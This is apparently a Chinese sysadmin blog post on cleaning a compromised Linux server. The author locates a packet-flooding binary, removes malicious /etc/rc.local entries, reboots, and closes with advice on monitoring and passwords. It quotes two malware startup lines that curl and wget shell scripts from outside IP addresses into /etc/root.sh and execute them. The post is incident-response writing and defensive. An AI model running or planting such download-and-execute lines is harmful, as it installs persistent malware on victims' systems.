标签:size 连接 无法 启动 find image sha 发包 root.sh
快下班,问题来了记一次快下班的记录
快下班了,好友发来了一张照片,如下:
中毒了,没问题,肯定是!!!
**有监控吗,快速查看流量图,看看是否发包或者被发包?**
答曰:没有监控
**那查看一下交换机的接口流量呢?**
答曰:交换机是傻瓜二层的
**那看看防火墙的呢?**
查看流量并没有什么影响。
实在是解决太慢了,而对方的机器是内容,最后通过内容的某太机器,我远程朋友的qq桌面,远程服务器,10分钟后终于连接上了。
1、find / -name cranber* #查看占用cpu文件的位置
2、mv /cranber* /cranber.bak
#将发包文件移动位置,让程序启动的时候找不到它。
本次的文件是在/ 根目录下,具体文件名我就不写出来了。
3、cat /etc/rc.local
#查看系统启动文件有没有异常的启动项,结果发现了,如下:
#curl http://207.246.68.21/rootv2.sh > /etc/root.sh ; wget -P /etc http://207.246.68.21/rootv2.sh ; rm -rf /etc/root.sh.* ; bash /etc/root.sh
#curl http://172.96.252.86/rootv3.sh > /etc/root.sh ; wget -O /etc/root.sh http://172.96.252.86/rootv3.sh ; bash /etc/root.sh
4、先将这两行 注释掉再说。
5、查看步骤3 下载下来的root开头的文件
find / -name root*
显示都是以root.sh开头的 ,如:root.sh、root.sh.1、root.sh.2、
目录都在/etc下边
6、移动root.sh 开头的文件到随便一个目录
mkdir /root/bak
mv /etc/root.sh* /root/bak
7、重启服务器
目的是通过重启服务器关掉病毒进程,同时查看还有没有别的病毒脚本,在启动的时候跟着系统启动。
8、系统起来之后
通过top命令查看,系统已经恢复正常,没有什么异常了。又观察了10分钟,并没有什么问题了。
9、修改密码
这时候应该及时修改 系统密码、数据库密码、以及相关的密码。
10、备份数据
备份相关的重要数据,以便系统如果被黑到无法恢复的地步,还有后手。
初步判断本次中毒原因为密码被漏扫,暴力破解了。
日常运维
必须有监控
必须有监控报警
必须有密码复杂机制
必须有密码更新机制
必须有运维技术能力
(最关键:人外有人、天外有天、还得有人脉)
标签:size 连接 无法 启动 find image sha 发包 root.sh
原文地址:http://blog.51cto.com/506554897/2067714